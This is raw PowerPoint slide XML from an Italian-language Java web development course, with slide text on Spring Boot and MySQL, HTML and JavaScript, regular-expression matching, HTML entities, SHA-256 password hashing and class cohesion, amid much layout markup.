    <dgm:cxn modelId="{5E37F66D-8B84-4840-BE3E-204DE512DB77}" type="presParOf" srcId="{FD63E3C2-1B5F-4FCB-BBC1-5000FC744E1B}" destId="{B935D0A8-FCC8-472D-AA10-9947401DA2F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1AAEC-D324-46F2-83D5-C0978BD39C73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1790063" y="36247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1E4B56-2BA7-475E-AAC9-598C59CABD01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="386063" y="20021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it-IT" sz="3600" kern="1200"/>
            <a:t>Server side</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="386063" y="2002149"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D4B5CBA1-B270-494F-B1C7-9D97B58EBC8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="386063" y="2709534"/>
          <a:ext cx="4320000" cy="622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it-IT" sz="1700" kern="1200"/>
            <a:t>MySQL</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1700" kern="1200" dirty="0"/>
            <a:t>Spring Boot</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="386063" y="2709534"/>
        <a:ext cx="4320000" cy="622168"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C004BB5-7C17-4654-A497-4127DA7B9A8C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6866064" y="36247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AB2834-5278-4EF0-9EBA-8ECFC4CBEF00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5462063" y="200214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it-IT" sz="3600" kern="1200"/>
            <a:t>Client side</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5462063" y="2002149"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B935D0A8-FCC8-472D-AA10-9947401DA2F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5462063" y="2709534"/>
          <a:ext cx="4320000" cy="622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it-IT" sz="1700" kern="1200"/>
            <a:t>HTML</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1700" kern="1200"/>
            <a:t>Javascript </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5462063" y="2709534"/>
        <a:ext cx="4320000" cy="62216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DA83F-99DB-1349-A1DD-23158A2DCDCE}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>08/07/24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8A5AB-166C-7943-B0D2-3D0FC34FDC32}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468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30</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1090156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40</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906328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41</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211518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42</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380198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43</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146532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r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: non è necessario importarla. E’ importata automaticamente in ogni sorgente Java.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>La classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> stessa contiene anche un metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> che prende come argomenti un'espressione regolare e una stringa di input, e restituisce un risultato booleano dopo averle confrontate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Se il requisito è solo quello di verificare se la stringa di input corrisponde al modello, si  risparmia tempo e righe di codice utilizzando il semplice metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> matches. Le classi Pattern e Matches vengono usate solo si deve manipolare la stringa di input o si deve riutilizzare il pattern.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FC18A5AB-166C-7943-B0D2-3D0FC34FDC32}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4070428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45</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468095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1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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46</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375931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47</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428421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48</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3871052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49</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289211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31</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1948925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r>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Le entità HTML sono sequenze di caratteri speciali predefinite utilizzate per rappresentare caratteri riservati o caratteri speciali nel markup HTML. Le entità HTML consentono di visualizzare correttamente questi caratteri nel browser senza che vengano interpretati come parte del codice HTML stesso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Le entità HTML sono composte da un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>ampersand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> (&amp;) seguito da un nome o un numero e terminano con un punto e virgola (;). Quando un browser incontra un'entità HTML all'interno del codice HTML, la converte nella corrispondente rappresentazione visibile del carattere.</a:t>
            </a:r>
          </a:p>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3200594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51</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13046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52</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2458641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53</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="930711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54</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1277292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55</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216035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56</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684998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buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Viene istanziato un oggetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>MessageDigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> utilizzando l'algoritmo di hash SHA-256 tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>MessageDigest.getInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>("SHA-256").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>La password viene convertita in un array di byte utilizzando l'encoding UTF-8 tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>password.getBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>(StandardCharsets.UTF_8).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Viene eseguito l'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> dei byte della password utilizzando il metodo digest() dell'oggetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>MessageDigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>. Il risultato è un array di byte che rappresenta l'hash della password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Viene creato un oggetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>StringBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> per costruire la rappresentazione esadecimale dell'hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Viene eseguito un ciclo su ciascun byte dell'array di hash. Per ogni byte, viene convertito in una rappresentazione esadecimale a due cifre e aggiunto all'oggetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>StringBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Alla fine del ciclo, viene restituita la rappresentazione esadecimale dell'hash come una stringa utilizzando il metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>() dell'oggetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>StringBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371605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58</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598036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59</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="576156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32</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22156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60</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379386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61</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1086994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62</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="548122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64</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3216282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65</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175610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66</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="925296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67</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1184083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68</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621247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u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Bassa coesione: la classe contiene metodi o attributi che non sono logicamente collegati o che non collaborano tra loro</a:t>
            </a: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69</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990669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70</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3499793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33</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
